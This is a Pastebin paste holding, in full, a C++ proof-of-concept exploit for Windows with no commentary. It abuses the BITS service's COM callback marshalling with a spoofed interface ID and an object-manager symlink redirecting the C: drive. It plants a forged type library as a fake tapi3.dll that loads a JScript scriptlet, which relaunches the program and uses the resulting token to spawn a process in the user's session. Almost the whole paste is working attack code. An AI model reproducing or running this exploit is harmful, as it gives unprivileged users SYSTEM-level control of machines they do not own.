SHARE
TWEET

Untitled

a guest Jan 24th, 2020 91 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <bits.h>
  2. #include <bits4_0.h>
  3. #include <stdio.h>
  4. #include <tchar.h>
  5. #include <lm.h>
  6. #include <string>
  7. #include <comdef.h>
  8. #include <winternl.h>
  9. #include <Shlwapi.h>
  10. #include <strsafe.h>
  11. #include <vector>
  12.  
  13. #pragma comment(lib, "shlwapi.lib")
  14.  
  15. static bstr_t IIDToBSTR(REFIID riid)
  16. {
  17.     LPOLESTR str;
  18.     bstr_t ret = "Unknown";
  19.     if (SUCCEEDED(StringFromIID(riid, &str)))
  20.     {
  21.         ret = str;
  22.         CoTaskMemFree(str);
  23.     }
  24.     return ret;
  25. }
  26.  
  27. GUID CLSID_AggStdMarshal2 = { 0x00000027,0x0000,0x0008,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };
  28. GUID IID_ITMediaControl = { 0xc445dde8,0x5199,0x4bc7,{ 0x98,0x07,0x5f,0xfb,0x92,0xe4,0x2e,0x09 } };
  29.  
  30. class CMarshaller : public IMarshal
  31. {
  32.     LONG _ref_count;
  33.     IUnknownPtr _unk;
  34.  
  35.     ~CMarshaller() {}
  36.  
  37. public:
  38.  
  39.     CMarshaller(IUnknown* unk) : _ref_count(1)
  40.     {
  41.         _unk = unk;
  42.     }
  43.  
  44.     virtual HRESULT STDMETHODCALLTYPE QueryInterface(
  45.         /* [in] */ REFIID riid,
  46.         /* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR *__RPC_FAR *ppvObject)
  47.     {
  48.         *ppvObject = nullptr;
  49.         printf("QI - Marshaller: %ls %p\n", IIDToBSTR(riid).GetBSTR(), this);
  50.  
  51.         if (riid == IID_IUnknown)
  52.         {
  53.             *ppvObject = this;
  54.         }
  55.         else if (riid == IID_IMarshal)
  56.         {
  57.             *ppvObject = static_cast<IMarshal*>(this);
  58.         }
  59.         else
  60.         {
  61.             return E_NOINTERFACE;
  62.         }
  63.         printf("Queried Success: %p\n", *ppvObject);
  64.         ((IUnknown*)*ppvObject)->AddRef();
  65.         return S_OK;
  66.     }
  67.  
  68.     virtual ULONG STDMETHODCALLTYPE AddRef(void)
  69.     {
  70.         printf("AddRef: %d\n", _ref_count);
  71.         return InterlockedIncrement(&_ref_count);
  72.     }
  73.  
  74.     virtual ULONG STDMETHODCALLTYPE Release(void)
  75.     {
  76.         printf("Release: %d\n", _ref_count);
  77.         ULONG ret = InterlockedDecrement(&_ref_count);
  78.         if (ret == 0)
  79.         {
  80.             printf("Release object %p\n", this);
  81.             delete this;
  82.         }
  83.         return ret;
  84.     }
  85.  
  86.     virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(
  87.         /* [annotation][in] */
  88.         _In_  REFIID riid,
  89.         /* [annotation][unique][in] */
  90.         _In_opt_  void *pv,
  91.         /* [annotation][in] */
  92.         _In_  DWORD dwDestContext,
  93.         /* [annotation][unique][in] */
  94.         _Reserved_  void *pvDestContext,
  95.         /* [annotation][in] */
  96.         _In_  DWORD mshlflags,
  97.         /* [annotation][out] */
  98.         _Out_  CLSID *pCid)
  99.     {
  100.         *pCid = CLSID_AggStdMarshal2;
  101.         return S_OK;
  102.     }
  103.  
  104.     virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(
  105.         /* [annotation][in] */
  106.         _In_  REFIID riid,
  107.         /* [annotation][unique][in] */
  108.         _In_opt_  void *pv,
  109.         /* [annotation][in] */
  110.         _In_  DWORD dwDestContext,
  111.         /* [annotation][unique][in] */
  112.         _Reserved_  void *pvDestContext,
  113.         /* [annotation][in] */
  114.         _In_  DWORD mshlflags,
  115.         /* [annotation][out] */
  116.         _Out_  DWORD *pSize)
  117.     {
  118.         *pSize = 1024;
  119.         return S_OK;
  120.     }
  121.  
  122.     virtual HRESULT STDMETHODCALLTYPE MarshalInterface(
  123.         /* [annotation][unique][in] */
  124.         _In_  IStream *pStm,
  125.         /* [annotation][in] */
  126.         _In_  REFIID riid,
  127.         /* [annotation][unique][in] */
  128.         _In_opt_  void *pv,
  129.         /* [annotation][in] */
  130.         _In_  DWORD dwDestContext,
  131.         /* [annotation][unique][in] */
  132.         _Reserved_  void *pvDestContext,
  133.         /* [annotation][in] */
  134.         _In_  DWORD mshlflags)
  135.     {
  136.         printf("Marshal Interface: %ls\n", IIDToBSTR(riid).GetBSTR());
  137.         IID iid = riid;
  138.         if (iid == __uuidof(IBackgroundCopyCallback2) || iid == __uuidof(IBackgroundCopyCallback))
  139.         {
  140.             printf("Setting bad IID\n");
  141.             iid = IID_ITMediaControl;
  142.         }
  143.         HRESULT hr = CoMarshalInterface(pStm, iid, _unk, dwDestContext, pvDestContext, mshlflags);
  144.         printf("Marshal Complete: %08X\n", hr);
  145.         return hr;
  146.     }
  147.  
  148.     virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(
  149.         /* [annotation][unique][in] */
  150.         _In_  IStream *pStm,
  151.         /* [annotation][in] */
  152.         _In_  REFIID riid,
  153.         /* [annotation][out] */
  154.         _Outptr_  void **ppv)
  155.     {
  156.         return E_NOTIMPL;
  157.     }
  158.  
  159.     virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(
  160.         /* [annotation][unique][in] */
  161.         _In_  IStream *pStm)
  162.     {
  163.         return S_OK;
  164.     }
  165.  
  166.     virtual HRESULT STDMETHODCALLTYPE DisconnectObject(
  167.         /* [annotation][in] */
  168.         _In_  DWORD dwReserved)
  169.     {
  170.         return S_OK;
  171.     }
  172. };
  173.  
  174. class FakeObject : public IBackgroundCopyCallback2, public IPersist
  175. {
  176.     LONG m_lRefCount;
  177.  
  178.     ~FakeObject() {};
  179.  
  180. public:
  181.     //Constructor, Destructor
  182.     FakeObject() {
  183.         m_lRefCount = 1;
  184.     }
  185.  
  186.     //IUnknown
  187.     HRESULT __stdcall QueryInterface(REFIID riid, LPVOID *ppvObj)
  188.     {
  189.         if (riid == __uuidof(IUnknown))
  190.         {
  191.             printf("Query for IUnknown\n");
  192.             *ppvObj = this;
  193.         }
  194.         else if (riid == __uuidof(IBackgroundCopyCallback2))
  195.         {
  196.             printf("Query for IBackgroundCopyCallback2\n");
  197.             *ppvObj = static_cast<IBackgroundCopyCallback2*>(this);
  198.         }
  199.         else if (riid == __uuidof(IBackgroundCopyCallback))
  200.         {
  201.             printf("Query for IBackgroundCopyCallback\n");
  202.             *ppvObj = static_cast<IBackgroundCopyCallback*>(this);
  203.         }
  204.         else if (riid == __uuidof(IPersist))
  205.         {
  206.             printf("Query for IPersist\n");
  207.             *ppvObj = static_cast<IPersist*>(this);
  208.         }
  209.         else if (riid == IID_ITMediaControl)
  210.         {
  211.             printf("Query for ITMediaControl\n");
  212.             *ppvObj = static_cast<IPersist*>(this);
  213.         }
  214.         else
  215.         {
  216.             printf("Unknown IID: %ls %p\n", IIDToBSTR(riid).GetBSTR(), this);
  217.             *ppvObj = NULL;
  218.             return E_NOINTERFACE;
  219.         }
  220.  
  221.         ((IUnknown*)*ppvObj)->AddRef();
  222.         return NOERROR;
  223.     }
  224.  
  225.     ULONG __stdcall AddRef()
  226.     {
  227.         return InterlockedIncrement(&m_lRefCount);
  228.     }
  229.  
  230.     ULONG __stdcall Release()
  231.     {
  232.         ULONG  ulCount = InterlockedDecrement(&m_lRefCount);
  233.  
  234.         if (0 == ulCount)
  235.         {
  236.             delete this;
  237.         }
  238.  
  239.         return ulCount;
  240.     }
  241.  
  242.     virtual HRESULT STDMETHODCALLTYPE JobTransferred(
  243.         /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob)
  244.     {
  245.         printf("JobTransferred\n");
  246.         return S_OK;
  247.     }
  248.  
  249.     virtual HRESULT STDMETHODCALLTYPE JobError(
  250.         /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
  251.         /* [in] */ __RPC__in_opt IBackgroundCopyError *pError)
  252.     {
  253.         printf("JobError\n");
  254.         return S_OK;
  255.     }
  256.  
  257.  
  258.     virtual HRESULT STDMETHODCALLTYPE JobModification(
  259.         /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
  260.         /* [in] */ DWORD dwReserved)
  261.     {
  262.         printf("JobModification\n");
  263.         return S_OK;
  264.     }
  265.  
  266.  
  267.     virtual HRESULT STDMETHODCALLTYPE FileTransferred(
  268.         /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
  269.         /* [in] */ __RPC__in_opt IBackgroundCopyFile *pFile)
  270.     {
  271.         printf("FileTransferred\n");
  272.         return S_OK;
  273.     }
  274.  
  275.     virtual HRESULT STDMETHODCALLTYPE GetClassID(
  276.         /* [out] */ __RPC__out CLSID *pClassID)
  277.     {
  278.         *pClassID = GUID_NULL;
  279.         return S_OK;
  280.     }
  281. };
  282.  
  283. _COM_SMARTPTR_TYPEDEF(IBackgroundCopyJob, __uuidof(IBackgroundCopyJob));
  284. _COM_SMARTPTR_TYPEDEF(IBackgroundCopyManager, __uuidof(IBackgroundCopyManager));
  285.  
  286. static HRESULT Check(HRESULT hr)
  287. {
  288.     if (FAILED(hr))
  289.     {
  290.         throw _com_error(hr);
  291.     }
  292.     return hr;
  293. }
  294.  
  295. #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
  296.  
  297. typedef NTSTATUS(NTAPI* fNtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
  298. typedef VOID(NTAPI *fRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
  299.  
  300. FARPROC GetProcAddressNT(LPCSTR lpName)
  301. {
  302.     return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
  303. }
  304.  
  305.  
  306. class ScopedHandle
  307. {
  308.     HANDLE _h;
  309. public:
  310.     ScopedHandle() : _h(nullptr)
  311.     {
  312.     }
  313.  
  314.     ScopedHandle(ScopedHandle&) = delete;
  315.  
  316.     ScopedHandle(ScopedHandle&& h) {
  317.         _h = h._h;
  318.         h._h = nullptr;
  319.     }
  320.  
  321.     ~ScopedHandle()
  322.     {
  323.         if (!invalid())
  324.         {
  325.             CloseHandle(_h);
  326.             _h = nullptr;
  327.         }
  328.     }
  329.  
  330.     bool invalid() {
  331.         return (_h == nullptr) || (_h == INVALID_HANDLE_VALUE);
  332.     }
  333.  
  334.     void set(HANDLE h)
  335.     {
  336.         _h = h;
  337.     }
  338.  
  339.     HANDLE get()
  340.     {
  341.         return _h;
  342.     }
  343.  
  344.     HANDLE* ptr()
  345.     {
  346.         return &_h;
  347.     }
  348.  
  349.  
  350. };
  351.  
  352. ScopedHandle CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)
  353. {
  354.     fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT("RtlInitUnicodeString");
  355.     fNtCreateSymbolicLinkObject pfNtCreateSymbolicLinkObject = (fNtCreateSymbolicLinkObject)GetProcAddressNT("NtCreateSymbolicLinkObject");
  356.  
  357.     OBJECT_ATTRIBUTES objAttr;
  358.     UNICODE_STRING name;
  359.     UNICODE_STRING target;
  360.  
  361.     pfRtlInitUnicodeString(&name, linkname);
  362.     pfRtlInitUnicodeString(&target, targetname);
  363.  
  364.     InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
  365.  
  366.     ScopedHandle hLink;
  367.  
  368.     NTSTATUS status = pfNtCreateSymbolicLinkObject(hLink.ptr(), SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);
  369.     if (status == 0)
  370.     {
  371.         printf("Opened Link %ls -> %ls: %p\n", linkname, targetname, hLink.get());
  372.         return hLink;
  373.     }
  374.     else
  375.     {
  376.         printf("Error creating link %ls: %08X\n", linkname, status);
  377.         return ScopedHandle();
  378.     }
  379. }
  380.  
  381.  
  382. bstr_t GetSystemDrive()
  383. {
  384.     WCHAR windows_dir[MAX_PATH] = { 0 };
  385.  
  386.     GetWindowsDirectory(windows_dir, MAX_PATH);
  387.  
  388.     windows_dir[2] = 0;
  389.  
  390.     return windows_dir;
  391. }
  392.  
  393. bstr_t GetDeviceFromPath(LPCWSTR lpPath)
  394. {
  395.     WCHAR drive[3] = { 0 };
  396.     drive[0] = lpPath[0];
  397.     drive[1] = lpPath[1];
  398.     drive[2] = 0;
  399.  
  400.     WCHAR device_name[MAX_PATH] = { 0 };
  401.  
  402.     if (QueryDosDevice(drive, device_name, MAX_PATH))
  403.     {
  404.         return device_name;
  405.     }
  406.     else
  407.     {
  408.         printf("Error getting device for %ls\n", lpPath);
  409.         exit(1);
  410.     }
  411. }
  412.  
  413. bstr_t GetSystemDevice()
  414. {
  415.     return GetDeviceFromPath(GetSystemDrive());
  416. }
  417.  
  418. bstr_t GetExe()
  419. {
  420.     WCHAR curr_path[MAX_PATH] = { 0 };
  421.     GetModuleFileName(nullptr, curr_path, MAX_PATH);
  422.     return curr_path;
  423. }
  424.  
  425. bstr_t GetExeDir()
  426. {
  427.     WCHAR curr_path[MAX_PATH] = { 0 };
  428.     GetModuleFileName(nullptr, curr_path, MAX_PATH);
  429.     PathRemoveFileSpec(curr_path);
  430.  
  431.     return curr_path;
  432. }
  433.  
  434. bstr_t GetCurrentPath()
  435. {
  436.     bstr_t curr_path = GetExeDir();
  437.  
  438.     bstr_t ret = GetDeviceFromPath(curr_path);
  439.  
  440.     ret += &curr_path.GetBSTR()[2];
  441.  
  442.     return ret;
  443. }
  444.  
  445. void TestBits()
  446. {
  447.     IBackgroundCopyManagerPtr pQueueMgr;
  448.  
  449.     Check(CoCreateInstance(__uuidof(BackgroundCopyManager), NULL,
  450.         CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pQueueMgr)));
  451.  
  452.     IUnknownPtr pOuter = new CMarshaller(static_cast<IPersist*>(new FakeObject()));
  453.     IUnknownPtr pInner;
  454.  
  455.     Check(CoGetStdMarshalEx(pOuter, SMEXF_SERVER, &pInner));
  456.  
  457.     IBackgroundCopyJobPtr pJob;
  458.     GUID guidJob;
  459.     Check(pQueueMgr->CreateJob(L"BitsAuthSample",
  460.         BG_JOB_TYPE_DOWNLOAD,
  461.         &guidJob,
  462.         &pJob));
  463.    
  464.     IUnknownPtr pNotify;
  465.     pNotify.Attach(new CMarshaller(pInner));
  466.     {
  467.         ScopedHandle link = CreateSymlink(L"\\??\\C:", GetCurrentPath());
  468.         printf("Result: %08X\n", pJob->SetNotifyInterface(pNotify));
  469.     }
  470.     if (pJob)
  471.     {
  472.         pJob->Cancel();
  473.     }
  474.     printf("Done\n");
  475. }
  476.  
  477. class CoInit
  478. {
  479. public:
  480.     CoInit()
  481.     {
  482.         Check(CoInitialize(nullptr));
  483.         Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr,
  484.             RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_NO_CUSTOM_MARSHAL | EOAC_DYNAMIC_CLOAKING, nullptr));
  485.     }
  486.  
  487.     ~CoInit()
  488.     {
  489.         CoUninitialize();
  490.     }
  491. };
  492.  
  493. // {D487789C-32A3-4E22-B46A-C4C4C1C2D3E0}
  494. static const GUID IID_BaseInterface =
  495. { 0xd487789c, 0x32a3, 0x4e22,{ 0xb4, 0x6a, 0xc4, 0xc4, 0xc1, 0xc2, 0xd3, 0xe0 } };
  496.  
  497. // {6C6C9F33-AE88-4EC2-BE2D-449A0FFF8C02}
  498. static const GUID TypeLib_BaseInterface =
  499. { 0x6c6c9f33, 0xae88, 0x4ec2,{ 0xbe, 0x2d, 0x44, 0x9a, 0xf, 0xff, 0x8c, 0x2 } };
  500.  
  501. GUID TypeLib_Tapi3 = { 0x21d6d480,0xa88b,0x11d0,{ 0x83,0xdd,0x00,0xaa,0x00,0x3c,0xca,0xbd } };
  502.  
  503. void Create(bstr_t filename, bstr_t if_name, REFGUID typelib_guid, REFGUID iid, ITypeLib* ref_typelib, REFGUID ref_iid)
  504. {
  505.     DeleteFile(filename);
  506.     ICreateTypeLib2Ptr tlb;
  507.     Check(CreateTypeLib2(SYS_WIN32, filename, &tlb));
  508.     tlb->SetGuid(typelib_guid);
  509.  
  510.     ITypeInfoPtr ref_type_info;
  511.     Check(ref_typelib->GetTypeInfoOfGuid(ref_iid, &ref_type_info));
  512.  
  513.     ICreateTypeInfoPtr create_info;
  514.     Check(tlb->CreateTypeInfo(if_name, TKIND_INTERFACE, &create_info));
  515.     Check(create_info->SetTypeFlags(TYPEFLAG_FDUAL | TYPEFLAG_FOLEAUTOMATION));
  516.     HREFTYPE ref_type;
  517.     Check(create_info->AddRefTypeInfo(ref_type_info, &ref_type));
  518.     Check(create_info->AddImplType(0, ref_type));
  519.     Check(create_info->SetGuid(iid));
  520.     Check(tlb->SaveAllChanges());
  521. }
  522.  
  523. std::vector<BYTE> ReadFile(bstr_t path)
  524. {
  525.     ScopedHandle hFile;
  526.     hFile.set(CreateFile(path, GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr));
  527.     if (hFile.invalid())
  528.     {
  529.         throw _com_error(E_FAIL);
  530.     }  
  531.     DWORD size = GetFileSize(hFile.get(), nullptr);
  532.     std::vector<BYTE> ret(size);
  533.     if (size > 0)
  534.     {
  535.         DWORD bytes_read;
  536.         if (!ReadFile(hFile.get(), ret.data(), size, &bytes_read, nullptr) || bytes_read != size)
  537.         {
  538.             throw _com_error(E_FAIL);
  539.         }
  540.     }
  541.    
  542.     return ret;
  543. }
  544.  
  545. void WriteFile(bstr_t path, const std::vector<BYTE> data)
  546. {
  547.     ScopedHandle hFile;
  548.     hFile.set(CreateFile(path, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, nullptr));
  549.     if (hFile.invalid())
  550.     {
  551.         throw _com_error(E_FAIL);
  552.     }
  553.    
  554.     if (data.size() > 0)
  555.     {
  556.         DWORD bytes_written;
  557.         if (!WriteFile(hFile.get(), data.data(), data.size(), &bytes_written, nullptr) || bytes_written != data.size())
  558.         {
  559.             throw _com_error(E_FAIL);
  560.         }
  561.     }
  562. }
  563.  
  564. void WriteFile(bstr_t path, const char* data)
  565. {
  566.     const BYTE* bytes = reinterpret_cast<const BYTE*>(data);
  567.     std::vector<BYTE> data_buf(bytes, bytes + strlen(data));
  568.     WriteFile(path, data_buf);
  569. }
  570.  
  571. void BuildTypeLibs(LPCSTR script_path)
  572. {
  573.     ITypeLibPtr stdole2;
  574.     Check(LoadTypeLib(L"stdole2.tlb", &stdole2));
  575.  
  576.     printf("Building Library with path: %s\n", script_path);
  577.     unsigned int len = strlen(script_path);
  578.  
  579.     bstr_t buf = GetExeDir() + L"\\";
  580.     for (unsigned int i = 0; i < len; ++i)
  581.     {
  582.         buf += L"A";
  583.     }
  584.  
  585.     Create(buf, "IBadger", TypeLib_BaseInterface, IID_BaseInterface, stdole2, IID_IDispatch);
  586.     ITypeLibPtr abc;
  587.     Check(LoadTypeLib(buf, &abc));
  588.  
  589.  
  590.     bstr_t built_tlb = GetExeDir() + L"\\output.tlb";
  591.     Create(built_tlb, "ITMediaControl", TypeLib_Tapi3, IID_ITMediaControl, abc, IID_BaseInterface);
  592.  
  593.     std::vector<BYTE> tlb_data = ReadFile(built_tlb);
  594.     for (size_t i = 0; i < tlb_data.size() - len; ++i)
  595.     {
  596.         bool found = true;
  597.         for (unsigned int j = 0; j < len; j++)
  598.         {
  599.             if (tlb_data[i + j] != 'A')
  600.             {
  601.                 found = false;
  602.             }
  603.         }
  604.  
  605.         if (found)
  606.         {
  607.             printf("Found TLB name at offset %zu\n", i);
  608.             memcpy(&tlb_data[i], script_path, len);
  609.             break;
  610.         }
  611.     }
  612.  
  613.     CreateDirectory(GetExeDir() + L"\\Windows", nullptr);
  614.     CreateDirectory(GetExeDir() + L"\\Windows\\System32", nullptr);
  615.  
  616.     bstr_t target_tlb = GetExeDir() + L"\\Windows\\system32\\tapi3.dll";
  617.     WriteFile(target_tlb, tlb_data);
  618. }
  619.  
  620. const wchar_t x[] = L"ABC";
  621.  
  622. const wchar_t scriptlet_start[] = L"<?xml version='1.0'?>\r\n<package>\r\n<component id='giffile'>\r\n"
  623. "<registration description='Dummy' progid='giffile' version='1.00' remotable='True'>\r\n"\
  624. "</registration>\r\n"\
  625. "<script language='JScript'>\r\n"\
  626. "<![CDATA[\r\n"\
  627. "  new ActiveXObject('Wscript.Shell').exec('";
  628.  
  629. const wchar_t scriptlet_end[] = L"');\r\n"\
  630. "]]>\r\n"\
  631. "</script>\r\n"\
  632. "</component>\r\n"\
  633. "</package>\r\n";
  634.  
  635. bstr_t CreateScriptletFile()
  636. {
  637.     bstr_t script_file = GetExeDir() + L"\\run.sct";
  638.     bstr_t script_data = scriptlet_start;
  639.     bstr_t exe_file = GetExe();
  640.     wchar_t* p = exe_file;
  641.     while (*p)
  642.     {
  643.         if (*p == '\\')
  644.         {
  645.             *p = '/';
  646.         }
  647.         p++;
  648.     }
  649.  
  650.     DWORD session_id;
  651.     ProcessIdToSessionId(GetCurrentProcessId(), &session_id);
  652.     WCHAR session_str[16];
  653.     StringCchPrintf(session_str, _countof(session_str), L"%d", session_id);
  654.  
  655.     script_data += L"\"" + exe_file + L"\" " + session_str + scriptlet_end;
  656.  
  657.     WriteFile(script_file, script_data);
  658.  
  659.     return script_file;
  660. }
  661.  
  662. void CreateNewProcess(const wchar_t* session)
  663. {
  664.     DWORD session_id = wcstoul(session, nullptr, 0);
  665.     ScopedHandle token;
  666.     if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token.ptr()))
  667.     {
  668.         throw _com_error(E_FAIL);
  669.     }
  670.  
  671.     ScopedHandle new_token;
  672.  
  673.     if (!DuplicateTokenEx(token.get(), TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, new_token.ptr()))
  674.     {
  675.         throw _com_error(E_FAIL);
  676.     }
  677.  
  678.     SetTokenInformation(new_token.get(), TokenSessionId, &session_id, sizeof(session_id));
  679.  
  680.     STARTUPINFO start_info = {};
  681.     start_info.cb = sizeof(start_info);
  682.     start_info.lpDesktop = L"WinSta0\\Default";
  683.     PROCESS_INFORMATION proc_info;
  684.     WCHAR cmdline[] = L"sys32.exe";
  685.     if (CreateProcessAsUser(new_token.get(), nullptr, cmdline,
  686.         nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))
  687.     {
  688.         CloseHandle(proc_info.hProcess);
  689.         CloseHandle(proc_info.hThread);
  690.     }
  691. }
  692.  
  693. int wmain(int argc, wchar_t** argv)
  694. {
  695.     try
  696.     {
  697.         CoInit ci;
  698.         if (argc > 1)
  699.         {
  700.             CreateNewProcess(argv[1]);
  701.         }
  702.         else
  703.         {
  704.             bstr_t script = L"script:" + CreateScriptletFile();
  705.             BuildTypeLibs(script);
  706.             TestBits();
  707.         }
  708.     }
  709.     catch (const _com_error& err)
  710.     {
  711.         printf("Error: %ls\n", err.ErrorMessage());
  712.     }
  713.  
  714.     return 0;
  715. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top